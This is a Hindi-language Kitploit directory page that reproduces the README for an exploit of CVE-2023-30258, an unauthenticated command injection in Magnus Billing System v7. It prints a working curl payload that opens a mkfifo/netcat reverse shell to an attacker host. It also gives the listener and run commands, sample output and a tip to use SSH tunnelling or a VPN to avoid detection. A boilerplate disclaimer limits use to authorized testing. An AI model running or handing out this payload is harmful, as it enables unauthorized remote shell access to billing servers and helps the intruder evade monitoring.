Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-30258-magnus-billing-v7-exploit | Kitploit
उपकरण/GitHubGitHub/tinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubtinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit

CVE-2023-30258-magnus-billing-v7-exploit

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
711 साल पहलेअभी तक समीक्षित नहीं

Magnus Billing System v7 एक्सप्लॉइट

यह Python स्क्रिप्ट Magnus Billing System v7 में कमांड इंजेक्शन भेद्यता के शोषण को स्वचालित करती है, विशेष रूप से /mbilling/lib/icepay/icepay.php पर स्थित icepay.php स्क्रिप्ट में। यह एक्सप्लॉइट लक्षित सिस्टम पर मनमाने कमांड निष्पादित करने के लिए democ पैरामीटर का उपयोग करता है, और अंततः हमलावर-नियंत्रित मशीन के लिए एक रिवर्स शेल स्थापित करता है।

भेद्यता अवलोकन

यह भेद्यता एक क्राफ्टेड GET अनुरोध के माध्यम से बिना प्रमाणीकरण के कमांड इंजेक्शन की अनुमति देती है। मूल प्रूफ-ऑफ-कॉन्सेप्ट (PoC) ने निम्नलिखित curl कमांड का उपयोग किया था:

root@kitploit:~
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'

यह स्क्रिप्ट उस प्रक्रिया को स्वचालित करती है, जिससे इसे कमांड-लाइन तर्कों के माध्यम से कॉन्फ़िगर किया जा सकता है।

विशेषताएँ

  • कॉन्फ़िगर करने योग्य: कमांड-लाइन तर्कों के माध्यम से लक्ष्य IP, हमलावर IP और पोर्ट निर्दिष्ट करें
  • सरल: पेलोड के साथ HTTP अनुरोध भेजने के लिए requests लाइब्रेरी का उपयोग करता है
  • फीडबैक: एक्सप्लॉइट की प्रगति को ट्रैक करने के लिए स्पष्ट आउटपुट प्रदान करता है

पूर्वापेक्षाएँ

  • Python 3.x: सुनिश्चित करें कि आपके सिस्टम पर Python 3 स्थापित है
  • Requests लाइब्रेरी: requests Python मॉड्यूल स्थापित करें:
    root@kitploit:~
    pip install requests
    
  • Netcat: रिवर्स शेल के काम करने के लिए लक्षित सिस्टम पर netcat (nc) स्थापित होना चाहिए
  • लिसनर: रिवर्स शेल को पकड़ने के लिए हमलावर मशीन पर netcat लिसनर सेट करें
  • भेद्य लक्ष्य: लक्ष्य पर Magnus Billing System v7 चल रहा होना चाहिए और भेद्य icepay.php स्क्रिप्ट सुलभ होनी चाहिए

उपयोग

सेटअप

  1. क्लोन या डाउनलोड करें: स्क्रिप्ट को exploit.py के रूप में सहेजें
  2. लिसनर सेट करें: अपनी हमलावर मशीन पर netcat लिसनर शुरू करें:
    root@kitploit:~
    nc -lvnp <PORT>
    
    <PORT> को अपने चुने हुए पोर्ट (जैसे, 443) से बदलें

एक्सप्लॉइट चलाना

root@kitploit:~
python exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>

पैरामीटर:

  • -t, --target: लक्षित Magnus Billing System का IP पता
  • -a, --attacker: रिवर्स शेल प्राप्त करने के लिए आपका IP पता
  • -p, --port: रिवर्स शेल के लिए आपकी मशीन पर पोर्ट

उदाहरण

root@kitploit:~
python exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443

अपेक्षित आउटपुट:

root@kitploit:~
=== Magnus Billing System v7 Exploit ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
[+] Attacker: 10.8.64.79:443
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
[+] Request sent successfully!
[*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
  1. शेल पकड़ें: सफल होने पर रिवर्स शेल के साथ इंटरैक्ट करने के लिए अपने netcat लिसनर पर स्विच करें

तकनीकी नोट्स

  • पेलोड प्रकार: स्क्रिप्ट netcat के साथ FIFO-आधारित रिवर्स शेल (mkfifo) का उपयोग करती है
  • त्रुटि प्रबंधन: नेटवर्क त्रुटियों और अमान्य पोर्ट के लिए बुनियादी जाँच शामिल हैं
  • डीबगिंग: सर्वर की प्रतिक्रिया का निरीक्षण करने के लिए exploit() फ़ंक्शन में print(response.text) अनकमेंट करें
  • वैकल्पिक पेलोड: आवश्यकता पड़ने पर विभिन्न रिवर्स शेल पेलोड का उपयोग करने के लिए स्क्रिप्ट को संशोधित किया जा सकता है

समस्या निवारण

  • यदि कनेक्शन विफल हो जाता है, तो सत्यापित करें कि:
    • लक्षित सिस्टम पर netcat स्थापित है
    • कोई फ़ायरवॉल कनेक्शन को ब्लॉक नहीं कर रहा है
    • सही पोर्ट का उपयोग किया जा रहा है
    • लक्ष्य को पैच नहीं किया गया है

सुरक्षा संबंधी विचार

  • पहचान से बचने के लिए इस एक्सप्लॉइट का उपयोग करते समय SSH टनलिंग या VPN का उपयोग करने पर विचार करें
  • पेलोड सुरक्षा निगरानी प्रणालियों को ट्रिगर कर सकता है

अस्वीकरण

यह टूल केवल शैक्षिक और सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग केवल उन्हीं सिस्टमों पर करें जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है। जिन सिस्टमों के आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास सहमति नहीं है, उनके खिलाफ अनधिकृत उपयोग अवैध और अनैतिक है। लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत जारी किया गया है। अस्वीकरण को बरकरार रखते हुए इसे आवश्यकतानुसार संशोधित और वितरित करने के लिए स्वतंत्र महसूस करें।

योगदान

योगदान, बग रिपोर्ट और फीचर अनुरोधों का स्वागत है। कृपया बेझिझक पुल अनुरोध सबमिट करें या एक issue खोलें।

टूल डाउनलोड करें